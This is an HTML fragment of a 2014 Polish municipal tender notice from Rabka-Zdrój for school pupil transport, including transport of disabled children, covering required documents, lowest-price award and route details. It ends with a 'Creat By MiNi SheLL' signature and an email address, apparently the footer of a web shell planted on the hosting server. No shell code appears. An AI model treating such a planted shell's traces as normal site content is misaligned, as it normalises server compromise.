<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	W związku z art. 144 Ustawy Pzp Zamawiający informuje, że zmiana postanowień w zawartej umowie może nastąpić w następujących przypadkach, których nie można było przewidzieć w chwili zawarcia umowy, a w szczególności:
a)	zmianie uległy przepisy prawne istotne dla realizacji przedmiotu umowy;
b)	zmian teleadresowych Stron umowy określonych w umowie;
c)	zmianie uległy stawki podatku VAT;
d)	wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub gdy te zmiany są korzystne dla zamawiającego;
e)	siły wyższej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rabka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Rabce-Zdroju
ul. Parkowa 2 
34-700 Rabka-Zdrój
pok. nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2014 godzina 11:00, miejsce: Urząd Miejski w Rabce-Zdroju
ul. Parkowa 2 
34-700 Rabka-Zdrój
Sekretariat pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dowóz i odwóz uczniów Gimnazjum nr 1 w Rabce Zdrój w roku szkolnym 2014-2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres części I obejmuje:
- codzienny przywóz oraz odwóz uczniów według ustalonego harmonogramu z ul. Zaryte na ul. Jana Pawła II,
Trasa dla Części I:
- Gimnazjum nr 1 w Rabce - Zdrój: 
przystanek początkowy: parking obok Szkoły Podstawowej nr 4 ul. Zaryte, przystanek końcowy: parking przy ul. Jana Pawła II i powrót: Ilość uczniów: 31

Przywozy godz. 7.35 (przystanek początkowy), odwozy godz. 14.30 (odjazd z parkingu szkolnego)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dowóz i odwóz uczniów Zespołu Szkoły Podstawowej i Gimnazjum w Rdzawce w roku szkolnym 2014-2105.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres części II obejmuje:
- codzienny przewóz uczniów według ustalonego harmonogramu z miejscowości Zespołu Szkoły Podstawowej i Gimnazjum w Rdzawce.

Trasa dla Części II:
- Zespół Szkoły Podstawowej i Gimnazjum w Rdzawce: 
przystanek początkowy: przystanek PKS przy zakopiance Rdzawka 2 przy drodze krajowej nr 47         
przystanek końcowy: parking przy Zespole Szkoły Podstawowej i Gimnazjum w Rdzawce
i powrót: Ilość uczniów: 10

Przywozy godz. 7.20 (przystanek początkowy), odwozy godz. 14.20 (odjazd z parkingu szkolnego)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dowóz uczniów niepełnosprawnych wraz z opieką do placówek oświatowych w roku szkolnym 2014/2015.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - dowóz 1 dziecka niepełnosprawnego do przedszkola specjalnego przy Specjalnym Ośrodku Szkolno - Wychowawczym Nr 1 (SOSW Nr 1) w Nowym Targu, ul. Jana Pawła II 85 oraz dowóz 2 uczniów niepełnosprawnych do szkoły przy Ośrodku Rehabilitacyjno - Edukacyjno - Wychowawczym (OREW) w Nowym Targu, ul. Podtatrzańska 47 a..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com